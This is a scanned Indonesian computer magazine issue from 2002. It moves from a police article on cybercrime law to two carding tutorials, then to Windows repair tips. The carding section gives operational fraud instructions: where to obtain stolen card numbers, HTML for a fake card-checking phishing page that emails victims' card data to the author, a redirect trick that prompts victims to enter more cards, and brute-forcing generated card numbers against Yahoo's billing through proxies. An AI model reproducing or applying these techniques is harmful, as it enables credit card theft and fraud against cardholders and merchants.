an besar dari mereka belum menggunakan Internet nyidik yang sudah cukup berpengalaman (bukan penyidik
atau menjadi pelanggan pada salah satu ISP (Internet pemula), pendidikannya diarahkan untuk menguasai tek-
Service Provider). nis penyidikan dan menguasai administrasi penyidikan
b. Pengetahuan dan pengalaman para penyidik dalam me- serta dasar-dasar pengetahuan di bidang komputer dan
nangani kasus-kasus cyber crime masih terbatas. Mere- profil hacker.
ka belum mampu memahami teknik hacking, modus-
modus operandi para hacker dan profil-profilnya. Membangun fasilitas forensic computing
c. Faktor sistem pembuktian yang menyulitkan para Fasilitas forensic computing yang akan didirikan Polri
penyidik karena Jaksa (PU) masih meminta keterangan diharapkan akan dapat melayani tiga hal penting, yaitu:
saksi dalam bentuk Berita Acara Pemeriksaan (BAP)
formal sehingga diperlukan pemanggilan saksi/korban a. evidence collection
yang berada di luar negeri untuk dibuatkan berita b. forensic analysis
acaranya di Indonesia, belum bisa menerima pernya- c. expert witness
taan korban atau saksi dalam bentuk faksimili atau Meningkatkan upaya penyidikan dan kerja sama
email sebagai alat bukti. internasional
Fasilitas komputer forensik Dalam hal penanganan kasus cyber crime dan kasus-
Untuk membuktikan jejak-jejak para hacker, cracker dan kasus penyalahgunaan kartu kredit, Polri telah melakukan
precker dalam melakukan aksinya terutama yang berhu- koordinasi/joint investigation dengan pihak US Secret
bungan dengan program-program dan data-data kompu- Services baik di Semarang maupun di D.I. Yogyakarta.
ter, sarana Polri belum memadai karena belum ada kom- Terhadap kasus-kasus penggunaan nomor-nomor kartu
puter forensik. kredit secara tidak sah yang terjadi dan sedang dalam
Fasilitas ini diperlukan untuk mengungkap data-data proses penyidikan Polri, tersangka dapat divonis
digital serta merekam dan menyimpan bukti-bukti berupa sebagaimana kejahatan yang dilakukannya. Untuk itu,
soft copy (image, program, dsb). Dalam hal ini Polri yang telah dilakukan adalah sebagai berikut:
masih belum mempunyai fasilitas forensic computing a. Mengadakan penelitian ulang terhadap TKP, para saksi
yang memadai. dan berkas-berkas perkara cyber crime yang sedang
ditangani oleh para penyidik Polri.

November 2002 NeoTek 19


NeoTekno

Pasal 362 KUHP tentang Pencurian Pasal 378 KUHP tentang Penipuan

Unsur-unsurnya adalah: Unsur-unsurnya adalah:


a. Pelaku/orang yang melakukan perbuatan a. Pelaku/orang yang melakukan perbuatan
b. Mengambil dengan maksud untuk dimiliki. b. Membujuk dengan nama palsu, keadaan palsu,
c. Sesuatu barang. rangkaian kata bohong, dan tipu muslihat.
d. Seluruhnya atau sebagian kepunyaan orang lain. c. Memberikan sesuatu barang, yang membuat untung
untuk menghapus piutang.
e. Melawan hak (bertentangan dengan hukum).
d. Menguntungkan diri sendiri atau orang lain.
Ancaman hukuman maksimum 5 tahun penjara.
e. Melawan hak (bertentangan dengan hukum).
Ancaman hukuman maksimum 4 tahun penjara.

Pasal 263 KUHP tentang Pemalsuan Pasal 406 KUHP tentang Pengrusakan

Unsur-unsurnya adalah: Unsur-unsurnya adalah:


a. Pelaku/orang yang melakukan perbuatan a. Pelaku/orang yang melakukan perbuatan
b. Menerbitkan hak, perjanjian, membebaskan hutang, b. Merusak, membinasakan, membuat sehingga tidak
atau keterangan bagi suatu perbuatan. dapat dipakai lagi.
c. Seolah-olah surat tersebut asli dan tidak dipalsukan. c. Menghilangkan sesuatu barang.
d. Mendatangkan kerugian. d. Sebagian kepunyaan orang lain.
Ancaman hukuman maksimum 6 tahun penjara. Ancaman hukuman maksimum 5 tahun penjara.

b. Sworn written affidafit/BAP Sumpah untuk saksi dan perangkat hokum konvensional yang ada di Indonesia
korban yang berada di luar negeri dilakukan dengan belum atau tidak bisa menjangkau secara efektif karena
bantuan US Secret Service dan disosialisasikan kepada itu perlu diwujudkan hukum baru atau cyberlaw. Selain
PU dan pengadilan untuk menjadi alat bukti yang sah itu diperlukan peralatan forensik computing yang tepat
dalam proses pengadilan. guna pembuktian kejahatannya, serta menyiapkan
c. Melakukan koordinasi dengan jaksa pengiriman penyidik Polri untuk dididik dan mampu menyidik
internasional dalam hal pengungkapan perkara. cybercrime serta kerja sama dengan penegak hukum
d. Melibatkan saksi ahli dari AKKI (Asosiasi Kartu Kredit dengan yang ada di luar negeri.
Indonesia).
Upaya Penanggulangan
Hal-hal yang perlu diperhatikan dalam upaya penanggu-
langan kejahatan yang dilakukan dengan menggunakan
sarana komputer adalah sebagai berikut:
Apabila Sampai Terjadi (Semoga Tidak)
a. Meningkatkan sistem keamanan jaringan dan
informasi.
b. Memasang kontrol akses untuk menyaring pabila sampai terjadi ada anggota keluarga kita
user/pemakai sehingga hanya pemilik saja yang dapat
menggunakan jaringan tersebut.
A yang melakukan tindak pidana cybercrime dan
ditangkap polisi, maka perlu dipahami:
c. Melakukan penyaringan terhadap isi dari komunikasi a. Masa penahanan maksimum 20 hari.
elektronik.
d. Mencegah akses ke situs yang tidak berkaitan dengan b. Pengurusan sworn written affidafit/BAP untuk
bidang tugasnya. sasksi dan korban biasanya memakan waktu cukup lama
(dapat beberapa bulan).
Penutup Dengan demikian hampir pasti terhadap tersangka
Cybercrime merupakan permasalahan yang harus tindak pidana cybercrime akan dilakukan penangguhan
ditangani secara serius karena dampak dari kejahatan ini penahanan. Jadi apabila ada pihak-pihak yang
sangat luas dan banyak merugikan perekonomian menawarkan ‘jasa baik’ (dengan imbalan uang) untuk
masyarakat karena apabila tidak ditanggulangi akan membantu melakukan penangguhan penahanan, tidak
berkembang dan tidak terkendali dan dampaknya dapat usah dilayani.
sangat fatal bagi kehidupan bermasyarakat. Dari informasi lisan yang diperoleh dari Drs. Rusbagio
Kendala utama dalam penyelidikan cybercrime antara lain Ishak, Kombes Pol/49120373, Kadis Serse Polda Jateng.
boderless baik korbannya maupun tersangkanya sehingga

20 NeoTek November 2002


NeoTekno

Apa dan Bagaimana Carding


Teknik-teknik Mendapatkan Nomor CC
Tindakan mencuri nomor kartu kredit (credit card fraud) sudah tentu tidak dapat dibenarkan. Tetapi apa dan
bagaimana upaya orang untuk mendapatkan nomor kartu kredit digambarkan dengan gamblang oleh
Eryanto Sitorus (ery@postmaster.co.uk) disertai dengan contoh.

AGI ANDA YANG SUDAH BIASA CHATTING DI IRC suatu saat rekan anda di Internet mengirim mail, atau
B (Internet Relay Chat), mungkin istilah carder,
carding, dan CC sudah akrab di telinga anda.
memberitahu kepada anda alamat situsnya (homepage)
dengan domain atau host yang menurut anda agak
Kalau belum, cobalah bergabung (join) ke channel #cc, terkesan “wah,” maka cobalah untuk menyelidikinya,
#ccs, #cchome atau #cvv2 pada server-server IRC favorit, siapa tahu rekan anda tadi seorang carder.
seperti: DALnet, UnderNet dan EFnet, maka tidak lama Sebagai contoh misalnya rekan anda memamerkan alamat
setelah itu anda akan segera melihat bahwa betapa aktif, situsnya seperti ini: http://www.e-dony.com, atau katakan-
dinamis dan majemuknya channel-channel tersebut. lah alamat email teman anda seperti ini: dony@e-dony.
Disebut majemuk karena orang-orang yang masuk ke com. Maka untuk menyelidikinya, caranya adalah sebagai
dalamnya datang dari berbagai daerah, kota, provinsi dan berikut:
negara dari seluruh dunia. Mereka, atau sebagian besar
dari mereka yang join ke channel-channel itu doyan men- 1. Jalankan browser anda, lalu masuk ke situs
cari kartu-kartu kredit bajakan untuk digunakan sebagai http://dns411.com.
alat pembayaran ketika mereka berbelanja lewat Internet. 2. Ketikkan domain yang akan anda periksa (e-donny.
Jika anda sudah masuk ke sana, maka kenalilah mereka, com) kedalam field SWHOIS, kemudian klik tombol
karena orang-orang itulah yang nantinya berpeluang Search, lalu tunggu beberapa saat hingga hasilnya
besar sebagai carder. ditampilkan pada halaman result seperti yang terlihat
pada gambar di atas.
Dalam dunia Internet, kegiatan ilegal tersebut dikenal 3. Pada halaman result, periksa/baca keterangan yang
dengan istilah carding. Sedangkan orang yang membajak terdapat pada bagian Registrant dan Administrative
kartu kredit disebut sebagai carder atau frauder. Tapi anda Contact.
perlu cooling down sedikit, dan jangan buru-buru menu-
ding bahwa semua orang yang masuk ke channel-channel Pada halaman result sebagaimana yang tampak pada
di atas adalah carder, frauder atau bandit kartu kredit. Ha- gambar di atas, terlihat jelas bahwa seseorang yang
rap diketahui predikat itu baru akan resmi mereka sandang bernama Dony Tan telah menggunakan kartu kredit
jika data/nomor kartu kredit bajakan yang sudah mereka orang lain untuk meregistrasi domain (e-dony.com),
dapatkan digunakan untuk menyewa dan membeli sesua- dengan masa sewa selama 10 tahun. Persisnya domain
tu lewat Internet, apakah itu domain, email bayar, hosting, tersebut diregistasi pada tanggal 25 September 2000 yang
shell account, buku, sepatu, pakaian, jam tangan, Compact lalu, hingga berakhir nanti pada tanggal 25 September
Disc (CD), komputer (laptop) dan sebagainya. Agak sulit 2010. Keterangan yang mengidentifikasikan bahwa Dony
memang mengetahui dan membuktikannya. Namun jika seorang carder, dapat anda lihat dari informasi alamat
yang dibuatnya.

• Melihat aktivitas para carder di channel #cchome. • Awal proses pemeriksaan domain lewat situs dns411.com.

November 2002 NeoTek 21


NeoTekno

hanya kartu kredit, dalam channel tersebut anda juga bisa


me-request BNC, Proxy, Root, Shell Account, Domain,
Hosting, serta URL atau alamat-alamat situs porno yang
sifatnya komersil. Di samping itu, anda juga bisa mem-
peroleh informasi kartu kredit dengan cara “barter,” atau
yang lebih dikenal dengan istilah trade. Biasanya objek
yang dapat di-trade untuk mendapatkan kartu kredit, an-
tara lain: shell account, root, bnc, psybnc, domain, dan
proxy. Jika anda memiliki salah satu dari yang saya sebut-
kan itu, maka anda bisa memulainya dengan mengetikkan
kalimat seperti ini “Who wanna trade? I have shell account,
PsyBNC, BNC, Proxy and Roots. Message me for deal…”,
atau “I have valid and fresh credit card with cvv2, I need
shell or root, message me if you want to trade...” Sesaat
kemudian salah satu atau beberapa dari mereka akan se-
gera meng-query anda untuk barter. Dan selain me-request,
barter atau trade, data/nomor kartu kredit juga bisa anda
dapatkan dari program-program credit card generator,
• Informasi domain yang berhasil di-search dns411.com. seperti yang tampak pada gambar di halaman sebelah.
Dony tidak memberitahu alamat tempat tinggal (domisili) Kalau anda tertarik untuk mencoba program-program
serta nomor telepon yang sebenarnya, sebaliknya infor- (credit card generator) tersebut di atas, silahkan anda
masi itu dia samarkan dengan menuliskan alamatnya di download sendiri dari www16.brinkster.com/erytricksy/
Neraka, Kuntilanak. Tentu saja tujuannya agar pihak lain Software/. Namun perlu saya tegaskan, saya tidak menja-
tidak bisa melacak keberadaannya. Dari semua keterangan min bahwa informasi kartu kredit yang dihasilkannya
yang tampak pada gambar itu, hanya ada dua informasi atau yang di-generate program-program tersebut 100%
yang benar-benar milik Dony, yaitu nama dan alamat valid. Hal yang sama juga saya katakan pada data/nomor-
emailnya (lovechly@hotmail.com). Tapi apakah informasi nomor kartu kredit yang anda dapatkan secara gratis de-
itu cukup untuk melacak keberadaan orang yang bernama ngan cara me-request atau trade. Tidak seorang pun bisa
Dony Tan? Tentu saja tidak. Yang jelas Dony Tan adalah menjaminnya, oleh karena itu jangan terlalu banyak ber-
seorang carder, karena dia telah “menyikat” uang orang harap jika anda tidak ingin kecewa. Nah, agar anda tidak
lain sebesar delapan belas juta rupiah (Rp. 18.000.000).
Perhitungannya: Jika harga sewa domain per bulannya
sebesar Rp. 150.000,- maka ((10 tahun x 12) x Rp. 150.000,-)
= Rp. 18.000.000,- Jumlah tersebut tentu masih akan
membengkak lagi jika ditambahkan ke harga domain-
domain lain yang diregistrasinya.
Jadi jelaslah bahwa sama seperti hacking dan hacker, card-
ing dan carder adalah istilah-istilah yang berkonotasi ne-
gatif, karena apa yang mereka perbuat jelas-jelas merugi-
kan keuangan orang lain secara langsung. Bahkan saking
negatifnya, seorang pakar Multimedia dari Universitas
Gajah Mada, Yogyakarta, Raden Mas Roy Suryo, menga-
takan bahwa carder tidak lebih dari sekedar “maling.”
Alasannya karena carding bukanlah suatu hal yang sulit,
carding tidak sama dengan hacking. Intinya, beliau me-
ngatakan bahwa anda tidak harus atau perlu memiliki ke-
terampilan khusus untuk menjadi seorang carder.
Terlepas dari kontroversi apakah predikat carder itu se-
level dengan maling atau bukan, saya pikir kita tidak
perlu mempersoalkannya lagi. Yang jelas, sebagai penulis
artikel ini, saya tidak bermaksud menjadikan artikel ini
sebagai suatu statement untuk mendiskreditkan predikat
carder. Saya berprinsip biarlah setiap orang bebas memilih
predikatnya masing-masing, apakah itu sebagai program-
mer, hacker, cracker, phreaker, spammer, flooder atau
carder, itu hak anda! Dan jika anda bertanya mengapa
predikat-predikat itu menjadi ada? Jawabannya sederha-
na! Itu adalah dampak negatif dari kemajuan teknologi
informasi yang kian hari kian semakin canggih.
Sebenarnya untuk mendapatkan kartu kredit (kartu kre-
dit bajakan) tidak sulit. Data atau nomor-nomor kartu
kredit itu bisa anda minta (request) dengan gratis pada
channel #cc, #ccs, #cchome atau #cvv2. Cukup dengan me-
ngetik !cc atau !cvv2, maka tidak lama setelah itu sese- • Tampilan program credit card generator DOS (atas) dan Windows
orang akan berbaik hati memberikannya pada anda. Tidak (bawah).

22 NeoTek November 2002


NeoTekno

kecewa, karena kartu kredit yang anda dapatkan sudah dari pemilik aslinya, melainkan dari para carder yunior
tidak fresh lagi (declined), maka saya akan mencoba atau amatiran, yang menurut saya (mungkin) mereka
membantu anda mendapatkan data/nomor-nomor kartu merasa “sangat penasaran” ingin mengetahui total
kredit bajakan yang masih fresh, termasuk nomor cvv2- jumlah uang pada nomor kartu kredit yang baru saja
nya, caranya pun cukup mudah! mereka dapatkan. Dan satu hal lagi yang perlu anda ingat
Dalam hal ini, konsep yang saya buat untuk mendapatkan dan garis bawahi adalah, sedikit pun saya tidak merasa
data/nomor-nomor kartu kredit sangat sederhana, yaitu gembira pada apa yang sudah saya peroleh itu, apalagi
dengan membuat halaman Web bohongan yang seolah- sampai ikut-ikutan memanfaatkannya. Satu-satunya
olah berfungsi untuk memeriksa (checking) jumlah uang yang membuat saya merasa surprise hanya pada infor-
yang ada pada nomor kartu kredit. Namun meski ter- masi alamat IP. Betapa tidak, dari 78 buah alamat IP yang
golong sangat sederhana dan bersifat konvensional, secara ikut terekam bersama-sama dengan informasi nomor-
umum trik ini masih tetap OK. Buktinya pada uji coba nomor kartu kredit tersebut, saya menemukan alamat IP
yang saya lakukan, dalam waktu 3 hari, saya berhasil dari berbagai negara, yaitu: Hungaria, India, Malaysia,
mendapatkan kartu kredit sebanyak kurang lebih 78 buah Philipina, Brunai, dan Singapura, termasuk negara kita
dalam bentuk data. Indonesia. Bagi saya itu hanya sekedar bukti, bahwa
apapun yang kita lakukan di Internet, sekecil apapun itu,
Dari jumlah tersebut, sebanyak 35% masih valid. Tapi selalu bersifat ”anything is possible.” Engga percaya?
tolong anda jangan salah sangka, data/ nomor-nomor Silakan anda coba sendiri.
kartu kredit yang saya dapatkan itu tidak saya peroleh

Skenario mendapatkan nomor kartu kredit


Agar skenario ini dapat bekerja sesuai dengan yang direncanakan, maka anda wajib memiliki email form dan hosting terlebih dahulu. Jika
anda tertarik dengan email form yang saya pakai, silahkan anda signup account anda di www.topcities.com. Atau jika tidak silakan anda
search sendiri email form yang lain. Jika anda memilih account di topcities.com, maka pihak pengelola situs tersebut akan memberikan
anda listing HTML di bawah ini yang harus anda masukkan ke form pada Langkah 1:
<FORM METHOD=POST ACTION="http://tricksy.topcities.com/cgi-bin/home/formmail/tricksy"><BR><BR>
<INPUT TYPE="HIDDEN" NAME="account" VALUE="tricksy"><BR><BR>
<INPUT TYPE="HIDDEN" NAME="cata" VALUE="accounts"><BR><BR>
Your Name: <INPUT TYPE="TEXT" NAME="Your Name"><BR><BR>
Your Email Address: <INPUT TYPE="TEXT" NAME="Your Email Address"><BR><BR>
Comments:<BR><BR>
<TEXTAREA NAME="Comments" ROWS=10 COLS=45></TEXTAREA><BR><BR>
<INPUT TYPE="SUBMIT">
</FORM>
Catatan khusus:
Penulis tidak bertanggung jawab untuk segala sesuatu yang ditimbulkan dari artikel ini.

Pada halaman Web ini, pengunjung Selanjutnya muncul halaman di atas Setelah beberapa detik, muncul halaman
1 harus mengisi form kartu kredit. Se- 2 yang menampilkan pesan untuk 3 yang menampilkan pesan bahwa nomor
telah itu, ia harus menekan tombol menunggu. Sementara itu informasi kartu kredit yang dimasukkan sudah tidak
Submit. para form dikirimkan ke email saya. valid. Ini akan membuat korban penasaran
dan memasukkan nonor-nomor lain.

<HTML>
<HEAD>
<TITLE>Free Credit Card Service (Secure Site
Seal)</TITLE>
<META HTTP-EQUIV="REFRESH" CONTENT="30;
URL=http://www16.brinkster.com/erytricksy/failed.html">
</HEAD>
<BODY>
</BODY>
</HTML>

Lewat opsi di atas, saya memerintah- Menu Form Properties ini juga mengi- Skrip yang mengatur waktu pemang-
4 kan isi form agar dikirimkan ke 5 rimkan isi form ke email sekaligus 6 gilan halaman Web pada Langkah 3
alamat email saya. memanggil halaman Web pada setelah berselang 30 detik.
Langkah 2.

November 2002 NeoTek 23


NeoTekno

Apa dan Bagaimana Carding


Membeli Account dengan Cracking-Carding
Salah satu kegiatan carding yang relatif ‘soft’ adalah membeli account di Internet dengan
menggunakan credit card curian. Biar bagaimana pun kegiatan ini tetap merupakan tindak pidana.

ERNAH DENGAR ATAU BACA (DARI KIRIMAN Yahoo atau “anak-anak” tidak perlu atau dapat mengurangi pekerjaan
P teman) bahwa Yahoo tidak gratis lagi untuk fasi-
litas forward atau email POP3-nya? Bagi peng-
semacam ini—carding.
Hal-hal yang dipaparkan disini adalah pengetahuan, dan
guna email, yang terbiasa dengan fasilitas forward/POP3, pengetahuan bukanlah suatu kejahatan. Jika terjadi sesua-
hal ini akan jelas sekali memberatkan karena fasilitas tu, penulis tidak bertanggung jawab atas apa yang terjadi.
yang satu ini amat besar manfaatnya. Dengan adanya
pop3 kita dapat “mengambil” data email kita pada server Penulis mencoba “bekerja” pada bulan april 2002, sehing-
penyedia layanan email. ga kemungkinan besar di bulan-bulan mendatang yahoo
lebih ketat dalam hal carding ini.
Artikel ini adalah sebagai suatu sharing pengalaman dari
penulis kepada pembaca secara umum dan newbie secara Sebagai tambahan, hal ini adalah ide awal untuk melaku-
khusus (dan bukan suatu tutor yang mengajarkan orang kan cracking, terhadap billing (wallet) di Yahoo dengan
untuk melakukan hal-hal yang sama, karena perbuatan mengisikan nomor CC palsu. Nah, untuk mengisikan
ini dianggap sebagian orang adalah perbuatan yang ter- nomor-nomor CC palsu tersebut dibutuhkan keuletan.
cela dan rendah), yaitu membeli servis tersebut (forward/ Untuk itu, digunakan suatu teknik bernama brute force.
POP3) dengan menggunakan CC (Credit Card) “bajakan.” Di sinilah letak dari cracking tersebut karena brute force
Perbuatan ini (disebut juga carding) tergolong perbuatan nomor CC adalah salah satu teknik cracking.
kriminal. Namun ada sebagian kelompok orang—terma- Namun brute force yang digunakan sesuai dengan tipe kartu
suk penulis—yang menganggap perbuatan ini adalah (visa, mastercard dll) dan bukan asal mengisikan angka-
suatu (game) gambling, atau nasib-nasiban karena dalam angka yang berurut belaka, yaitu dengan mengisikan
melakukan aksi tidak selalu berhasil, tergantung data CC angka-angka yang sudah pasti dan jelas “valid” untuk
yang didapatkan (dari hacking situs bank, shop/toko mau- ukuran sebuah nomor CC. Maksud penulis dengan valid,
pun dari sekedar pemberian teman). Sebenarnya teknik misalnya: nomor CC dengan awalan 5 menunjukkan kar-
yang digunakan bukan murni carding, namun juga terda- tu tersebut adalah Mastercard, sedangkan angka-angka
pat trik cracking-nya. Sehingga saya menyebutnya yang lain yang mengikutinya adalah kode bank dan lain-
Cracking-Carding. nya. Sehingga tidak langsung mengisikan angka-angka
Artikel ini mungkin dapat dijadikan dipelajari oleh peru- tersebut.
sahaan e-commerce yang ada di Indonesia, serta menam- Untuk melakukan pengecekan pada nomor tersebut dapat
bah pengetahuan bagi yang lainnya. Selain itu, diharap- digunakan keygen CC yang dilampirkan. Oleh karena itu,
kan dengan adanya tulisan ini, maka akan ada/tumbuh jika ada pembaca yang mengetahui cara membuat pro-
banyak situs lokal penyedia pop mail gratis, sehingga gram tersebut (bukan keygen, tapi pengisi nomor CC di

• Situs yang beralamat di http://www.alaric-systems.co.uk/fractals.html • Penerbit kartu kredit American Express


ini menawarkan layanan pemantauan pencurian nomor kartu kredit (www10.americanexpress.com/sif/cda/page/0,1641,5963,00.asp)
secara real time. memberi jaminan bahwa kartu kredit mereka terlindung.

24 NeoTek November 2002


NeoTekno

bagian Form CC number, secara acak/brute force dengan Langkah-langkah membeli account Yahoo!
angka-angka yang sudah ditentukan), maka akan lebih
cepat dalam melakukan cracking billing Yahoo.
Hal ini mirip dengan melakukan cracking password email,
di mana kita harus memasukkan ID-nya kemudian pass-
word-nya dengan cracking (brute force kamus).
OK, sekarang mari mulai melakukan “tugas.” Pertama
kita harus menyiapkan beberapa hal, di antaranya:

Mendaftar di Yahoo sebagai user (bagi yang belum memiliki


1 email account Yahoo).

• Contoh
data CC
yang
diperlukan.

1. Semua data CC (Credit Card), dari first name sampai


ke expired date CC. Semakin banyak data yang
didapat, maka kemungkinan cracking akan menjadi
Mengisi formulir pendaftaran.
lebih besar. 2
2. CC Generator (digunakan jika CC sudah tidak fresh lagi)
Ini adalah satua contoh program CC generator. Masih ba-
nyak jenis CC generator yang ada dan dapat dicari di
Internet. Ada juga yang buatan anak Indonesia:

Memasukkan nama dan segala macam isian yang terdapat


3 pada formulir. Alamat email isi saja dengan alamat email kita.

Jika tidak cocok atau tidak berhasil, ubahlah angka-angka CC


4 dengan menggunakan generator yang telah disiapkan tadi.

Jika gagal, terus coba. Ganti dengan nomor CC cadangan


5 (yang telah dibuat dengan CC generator).
• Contoh data CC yang diperlukan.

November 2002 NeoTek 25


NeoTekno

Pada langkah ini dibutuhkan kesabaran yang besar, jika Isi email dengan email kita sendiri, jangan isi dengan
kita hanya mengharapkan CC dari orang lain (bukan hasil alamat email yang terdapat di dalam list CC.
hacking/cracking) yang belum tentu fresh/manjur. Di Sebaiknya dalam melakukan cracking-carding ini,
bagian inilah tantangannya seorang carder menaklukkan menggunakan Proxy.
"toko" tempat dia belanja. Dibagian ini jugalah kita
melakukan cracking CC. Jika berhasil, anda akan dapat Programmer brute force, (seperti yang telah saya ung-
melihatnya sendiri. :) (enggak surprise dong kalau harus kapkan di atas) dapat dperimudah dengan membuat
ditampilkan semua di sini). program brute force pengisi nomor CC yang telah dibuat
menggunakan CC Generator, pada form nomor kartu
Dan di bagian ini jugalah letak kesalahan Yahoo, yaitu kredit dan terus melakukan looping jika tidak berhasil.
tidak memberikan batasan pada pengisian form Wallet
sehingga mudah untuk melakukan cracking CC. Dan pesan terakhir dari penulis, anggaplah hal ini adalah
Seharusnya Yahoo membatasi pengisian form CC sebuah permainan, jangan dianggap serius, jadi kalau
tersebut, untuk beberapa kali kesalahan saja. gagal tidak kecewa :). Dan nikmatilah.
Hal-hal yang tertulis di atas, itu merupakan salah satu
(saja) contoh carding yang ada di Iinternet. Masih banyak
lagi yang lainnya, di antaranya membeli barang nyata,
bukan barang maya seperti yang penulis ungkapkan. Penulis adalah seorang mahasiswa STMIK Pontianak.
Saran dan kritik pembaca terhadap tulisan ini, dapat
Jika dalam melakukan isian Form Wallet tersebut kita mengirimkannya ke Pedhet_008@yahoo.com
berhasil, maka kita dapat membeli fasilitas apa saja yang
diberikan oleh yahoo kepada kita, diantaranya :
1. Mendapatkan tempat tampungan email yang lebih
besar (jika dibeli) Carding atau credit card fraud merupakan suatu tindak
2. forward/pop3 email (jika dibeli) pidana yang di Indonesia dapat dikenakan hukuman
3. Mendapatkan alamat domain (jika dibeli) sesuai dengan pasal 362 KUHP tentang pencurian
4. dan lain-lain. dengan ancaman hukuman maksimal 5 tahun penjara,
Tips dan Masukan Tambahan pasal 378 KUHP tentang penipuan dengan ancaman
Untuk mengecek nomor CC, selain dengan menggunakan hukuman maksimum 4 tahun penjara, dan pasal 263
CC generator, kita dapat juga dengan cara lain, yaitu KUHP tentang pemalsuan dengan ancaman hukuman
dengan mengeceknya di suatu channel di IRC (Dalnet) maksimum 6 tahun penjara
nama channelnya #TheCC, #yogyacarding dan masih
banyak channel lainnya. Artikel-artikel dalam kelompok Apa dan Bagaimana
Untuk mengisi form telp number, maka gantilah nomor Carding ini disajikan untuk keperluan pengetahuan
paling belakang dari nomor telpon tersebut, karena jika semata-mata dan sama sekali tidak dianjurkan untuk
dari pihak “toko” menelepon dan nomor yang dituju dipraktikkan. Pembaca diharapkan bersikap dewasa dan
salah sambung, maka toko akan tetap memanfaatkan informasi yang disajikan hanya untuk
“mengirimkannya.”. kepentingan ilmiah.

Hasil dan Bukti ‘Pembelian’ di Yahoo!

Mendapatkan storage yang besar. Hasil Order Forward/pop3. Hasil Order Domain.
1 2 3

26 NeoTek November 2002


NeoTekno

Mengatasi Kerusakan SO
Windows 9x/2000/ Me
Sebagai sistem operasi, Windows seringkali menjengkelkan penggunanya karena kerap rewel, kadang malah
mogok, tanpa sebab yang jelas. Eryanto Sitorus (ery@postmaster.co.uk) memberi tip cara mengantisipasi
dan memperbaiki kerusakan yang menimpa Windows anda.

ESKIPUN KEMAMPUAN SISTEM OPERASI Microsoft bekerja dengan benar, termasuk driver untuk perangkat
M Windows dalam hal keamanan (security), multi-
user, multitasking, atau dalam hal interprocess
keras seperti Printer, Modem, Sound Card, VGA Card,
Scanner, CD-ROM (R/W), atau Ethernet Card (jika ada).
communication tidak sebaik dan seandal sistem operasi Setelah semuanya beres, maka lakukan langkah-langkah
Unix, Linux, SunOS, atau FreeBSD, namun masih ada atau prosedur sebagai berikut:
beberapa hal yang dapat dibanggakan pada sistem Micro- 1. Copy-kan (backup) semua file berekstensi .INI yang
soft Windows 95/97/98/2000/ME (Millennium Edition). terdapat pada direktori C:\WINDOWS ke dalam direktori
Salah satunya adalah kemudahan untuk mengantisipasi lain, misalnya anda membuat direktori khusus dengan
dan mengatasi kerusakan yang terjadi pada sistem operasi nama Backup. Jika anda melakukannya dalam modus MS-
tersebut, dengan begitu maka diharapkan para pengguna DOS, maka perintahnya adalah sebagai berikut:
(user) dapat mengatasi persoalannya sendiri tanpa perlu
C:\WINDOWS> MD BACKUP
melakukan instalasi ulang, memanggil tenaga ahli atau C:\WINDOWS> COPY *.INI BACKUP
mengkonsultasikannya kepada orang lain, apalagi harus
membawanya ke tempat service komputer. Karena 2. Copy-kan (backup) file USER.DAT dan file SYSTEM.
sifatnya yang mudah dan praktis tersebut, kemudian DAT ke dalam direktori yang sama pada point 1. Jika anda
muncul lah istilah user-friendly. melakukannya dalam modus MS-DOS, maka anda harus
menormalkan artibut kedua file tersebut terlebih dahulu
Microsoft Windows memang sudah terkenal dengan sifat- dengan mengetik perintah di bawah ini:
nya yang ramah dan sangat memanjakan customer-nya.
C:\WINDOWS> ATTRIB -S -H -R USER.DAT
Namun sialnya Microsoft Windows juga terkenal dengan
C:\WINDOWS> ATTRIB -S -H -R SYSTEM.DAT
sifatnya yang rewel, tidak stabil, tidak aman, mudah
terinfeksi Virus, sering macet (hang). Dan satu lagi yang Setelah itu copy kedua file tersebut ke dalam direktori
paling menjengkelkan, file-file sistem operasi Microsoft yang sudah anda buat sebagai direktori backup, perintah
Windows sepertinya bisa rusak secara tiba-tiba tanpa untuk meng-copy-nya adalah:
sebab musabab yang jelas. Oleh karena itu tidak heran C:\WINDOWS> COPY *.DAT BACKUP
jika sistem operasi yang paling sering mengalami instalasi
ulang adalah Microsoft Windows. Tapi anda tidak perlu Jika telah selesai meng-copy, anda boleh mengembalikan
gusar karena ada cara yang lebih mudah dan praktis untuk status atribut kedua file tersebut di atas dengan mengetik
mencegah atau mengantisipasi terjadinya kerusakan, sa- perintah di bawah ini:
lah satunya adalah dengan cara mengamankan atau mem- C:\WINDOWS> ATTRIB +S +H +R USER.DAT
backup file-file sistem yang sudah terinstal dan bekerja C:\WINDOWS> ATTRIB +S +H +R SYSTEM.DAT
dengan benar untuk dipakai kembali di kemudian hari. 3. Backup setting
Dengan begitu, jika suatu hari kelak sistem di komputer registry yang aktif
anda benar-benar rusak, maka anda dapat memperbaiknya saat itu dengan
sendiri. Namun sebelum anda mulai melakukan langkah- mengetik perintah
langkah pengamanan sebagaimana yang dimaksud, SCANREG pada
pastikan bahwa sistem anda sudah dalam keadaan baik prompt MS-DOS,
(sempurna) dan bebas virus. Kemudian semua program- contoh:
program aplikasi yang anda perlukan sudah terinstal dan C:\WINDOWS> SCANREG • Gambar 1: Proses scanning registry.

November 2002 NeoTek 27


NeoTekno

• Gambar 2:
Laporan
hasil scanning
registry.

Jawablah pertanya-
an yang muncul
pada Gambar 2 de-
ngan mengklik
tombol Yes untuk
memulai proses
backup.
• Gambar 3: Proses backup registry.
• Gambar 4:
Proses
backup registry
selesai.

4. Untuk lebih meyakinkan, anda juga dapat membackup


registry setting dengan cara lain, yaitu dengan menyim- • Gambar 7: Menyimpan setting registy ke dalam file khusus.
pannya ke dalam file khusus berekstensi .REG. Caranya
adalah sebagai berikut: update-nya setiap kali anda melakukan perubahan-peru-
bahan, termasuk pada saat anda menginstal driver atau
• Klik tombol Start/Run
program aplikasi yang lain, yakni dengan cara mengulang
• Pada jendela Run ketik REGEDIT, lalu klik tombol OK
semua instruksi sebagaimana yang sudah dijelaskan di
• Gambar 5: atas.
Menjalankan
program Regedit
Mengatasi/Memperbaiki Kerusakan
melalui Secara umum, penyebab kerusakan sistem operasi Micro-
menu Run. soft Windows adalah sebagian besar diakibatkan oleh be-
berapa hal sebagai berikut:
• Komputer mati secara tiba-tiba karena listrik padam.
• Komputer terlalu sering dimatikan tanpa melalui proses
Shut Down.
• Proses instalasi tidak sempurna (gagal).
• Terinfeksi virus.
• Program anti virus mencoba memperbaiki file-file
sistem yang terinfeksi.
• Setting registry kacau (berubah).
• Beberapa file sistem sudah tidak uptodate.
